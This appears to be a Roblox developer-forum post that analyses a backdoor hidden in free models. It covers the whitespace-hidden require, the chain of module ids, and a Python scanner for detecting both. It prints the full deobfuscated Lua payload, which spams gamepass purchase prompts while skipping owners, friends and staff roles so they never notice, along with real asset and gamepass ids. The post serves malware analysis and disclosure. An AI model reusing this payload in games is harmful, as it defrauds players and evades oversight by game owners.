How do backdoors usually work? [Explanation]

Viruses / backdoors

I think you’ve already heard about some cloned plugins / free models,
and you may already know about the viruses and backdoors.

The most basic ones don’t even bother hiding the script or hiding who made it,
but there is a more dangerous type that is hard to detect:
it is still a virus, but it is hidden deep inside the script, pushed off to the right behind ~200 spaces so it is not visible at a glance, like this
[image]

That is a screenshot from one of the victims of that kind of virus.

Let’s look at how it works inside.

  • first, that getfenv() construct is just an obfuscated way of calling require when the code runs

so what are we interested in is following the id (5758303792)
usually it’s the chain of ids

something like

  • 5758303792 - another id - another id - another id - … real script

That just makes the real script hard to find:
each script in the chain simply requires the next one.
[image]

In the end one user helped me with that and found the final id:

  • 9704956167
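The two tricks described above, a require call pushed off-screen behind a long run of spaces and a chain of module ids that each require the next, can both be checked mechanically. The following is an added example, not code from the original post: a small Python scanner that flags numeric require calls hidden behind whitespace in a script's source and then follows a chain of downloaded module sources to the last module that requires nothing. The sample scripts and the intermediate ids (1000000001, 1000000002) are constructed for the example; only 5758303792 and 9704956167 come from the post. The regex for the obfuscated form assumes it looks like getfenv()[...](<id>), which is an assumption about the obfuscation, not something the post spells out.

```python
import re

# Matches a plain require(<id>) or the obfuscated getfenv()[...](<id>) form.
# Assumption: the getfenv() form resolves to require, as the post says.
REQUIRE_ID = re.compile(
    r'(?:\brequire\s*\(|getfenv\s*\(\s*\)\s*\[[^\]]*\]\s*\()\s*(\d{6,})\s*\)'
)

# Constructed threshold: this many spaces before a call on one line counts as "hidden".
HIDDEN_GAP = 80


def find_hidden_requires(source):
    """Return (line_no, asset_id, hidden) for every numeric require in a script.

    hidden is True when the call sits after a long run of spaces, the trick the
    post describes (~200 spaces push it past the visible width of the editor).
    """
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for m in REQUIRE_ID.finditer(line):
            before = line[:m.start()]
            gap = len(before) - len(before.rstrip(" \t"))
            hits.append((n, int(m.group(1)), gap >= HIDDEN_GAP))
    return hits


def follow_chain(start_id, modules, max_depth=20):
    """Walk id -> id -> ... through a dict of downloaded module sources.

    Stops at the first module that requires nothing (the real payload), on a
    cycle, when a module was not downloaded, or at max_depth. Returns the
    chain of ids visited and a reason string.
    """
    chain = [start_id]
    seen = {start_id}
    current = start_id
    for _ in range(max_depth):
        src = modules.get(current)
        if src is None:
            return chain, "missing"
        ids = [aid for _, aid, _ in find_hidden_requires(src)]
        if not ids:
            return chain, "payload"
        nxt = ids[0]
        if nxt in seen:
            return chain, "cycle"
        chain.append(nxt)
        seen.add(nxt)
        current = nxt
    return chain, "depth"


# Constructed sample: a "free model" script whose payload require is hidden
# 200 spaces to the right of an innocent-looking line.
SAMPLE_PLACE_SCRIPT = (
    "local part = script.Parent\n"
    'part.Touched:Connect(function(hit) print("touched") end)' + " " * 200
    + 'getfenv()["require"](5758303792)\n'
)

# Constructed chain of module sources; the intermediate ids are placeholders.
SAMPLE_MODULES = {
    5758303792: "return require(1000000001)",
    1000000001: "local m = require(1000000002) return m",
    1000000002: 'return getfenv()["require"](9704956167)',
    9704956167: "spawn(function() -- real payload, no further require\nend)",
}

if __name__ == "__main__":
    for line_no, asset_id, hidden in find_hidden_requires(SAMPLE_PLACE_SCRIPT):
        print(f"line {line_no}: require({asset_id}) hidden={hidden}")
    chain, reason = follow_chain(5758303792, SAMPLE_MODULES)
    print(" -> ".join(str(i) for i in chain), f"[{reason}]")
```

Running the scanner over every Script and ModuleScript Source in a place before publishing a free model is the cheap check here; a numeric require in a model you did not write is worth a look regardless of where on the line it sits.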

Instruction

By the way, a small instruction on how to get a module by its id:
you just go to the Creator Store and paste the id into the URL
https://create.roblox.com/store/asset/[ID HERE]

You land on the asset page and just download the file.
Page:

Download button:
[image]

and you can drop it into the place.

Uncovering creator

Back to uncovering the truth :slight_smile:

You will get a script that looks like this:
[image]

MainModule:

The structure looks like this:

  1. a long obfuscated part (“the long part my guess is just decrypting the obfuscated code and the short part is the real code”)
  2. a custom Lua loadstring

What we are searching for is in the main module, and luckily we don’t have to search for long in this case,
because the owner gave it to us right at the start :slight_smile: [image]

As we follow that, we get to the main script,
and again it is the same layout:
[image]

Looks the same, right?
But things get much easier from now on.

MainModule:

Now finally we can read something!
The script just combines the descriptions of 2 gamepasses and executes them in the parser.

We can simply run the checks and look at what the actual code looks like:

spawn(function()
	-- Services, the two gamepass ids to push, the delay between prompts (redacted
	-- by the author as #####) and who created the game (a user or a group).
	local Players, MarketService, GamepassIds, Time, GameCreatorType, GameCreatorId =
		game:GetService("Players"), game:GetService("MarketplaceService"),
		{107584795, 107584737}, "############### ##### #################", game.CreatorType, game.CreatorId

	-- Decide whether a player gets spammed. The owner, friends of the owner and
	-- anyone whose group role looks like staff are skipped so they never notice it.
	function ShouldWePrompt(plr)
		if GameCreatorType == Enum.CreatorType.User then
			if plr:IsFriendsWith(GameCreatorId) or plr.UserId == GameCreatorId then
				return false
			end
		elseif GameCreatorType == Enum.CreatorType.Group then
			local Role = plr:GetRoleInGroup(GameCreatorId)
			local role = tostring(Role):lower()
			-- Any of these substrings in the role name, or a rank above 200, marks staff.
			if role:find("admin") or
				role:find("owner") or
				role:find("chairman") or
				role:find("dev") or
				role:find("creator") or
				role:find("vice") or
				role:find("alt") or
				role:find("barista") or
				role:find("senior") or
				role:find("mod") or
				role:find("staff") or
				role:find("assistant") or
				role:find("trainee") or
				role:find("ally") or
				role:find("allied") or
				role:find("allies") or
				role:find("manag") or
				role:find("contrib") or
				role:find("officer") or
				role:find("hold") or
				role:find("partner") or
				role:find("manage") or
				role:find("intern") or
				role:find("supervis") or
				role:find("coord") or
				role:find("exec") or
				role:find("cook") or
				role:find("chef") or
				role:find("cashier") or
				role:find("shift") or
				role:find("lead") or
				role:find("pres") or
				plr:GetRankInGroup(GameCreatorId) > 200 then
				return false
			end
		end
		return true
	end

	-- Prompt both gamepasses, up to 10 rounds, waiting Time between prompts
	-- (half as long for Premium members).
	function Prompt(plr)
		spawn(function()
			for _ = 1, 10 do
				for _, v in pairs(GamepassIds) do
					if not MarketService:UserOwnsGamePassAsync(plr.UserId, v) then
						MarketService:PromptGamePassPurchase(plr, v)
						if plr.MembershipType == Enum.MembershipType.Premium then
							wait(Time / 2)
						else
							wait(Time)
						end
					end
				end
			end
		end)
	end

	-- Hook players who join later, and also handle players already in the server.
	Players.PlayerAdded:Connect(function(Player)
		if ShouldWePrompt(Player) then
			Prompt(Player)
		end
	end)
	for _, Player in pairs(Players:GetPlayers()) do
		-- The inner condition is redacted by the author (#####); when it holds, nothing happens.
		if ShouldWePrompt(Player) then if ######################################################### then
			else Prompt(Player)
			end
		end
	end
end)

Quickly analyzing the code, you can see that it spams 2 gamepasses.

Explanation of the code above:
when a player joins, it spams them with prompts for 2 gamepasses,
but before that it checks whether the game was created under a group or by a player.

Group

  • if you are the owner
  • if by the group it checks whether you have a specific text in your group role
  • if the role value is higher than 200
  • if you are friends with the owner

Player

  • if you are the owner
  • if you are friends with the owner

and then prompts the gamepasses if all of the above are false.

Discovery

The creator used a lot of alts to publish the scripts / passes.
And the group that owns these gamepasses is Million Dollar Circle - Roblox

Thanks for the attention!
Hopefully Roblox moderation can investigate that one!

Have you uncovered any of the virus creators?
If yes, can you share your own story?
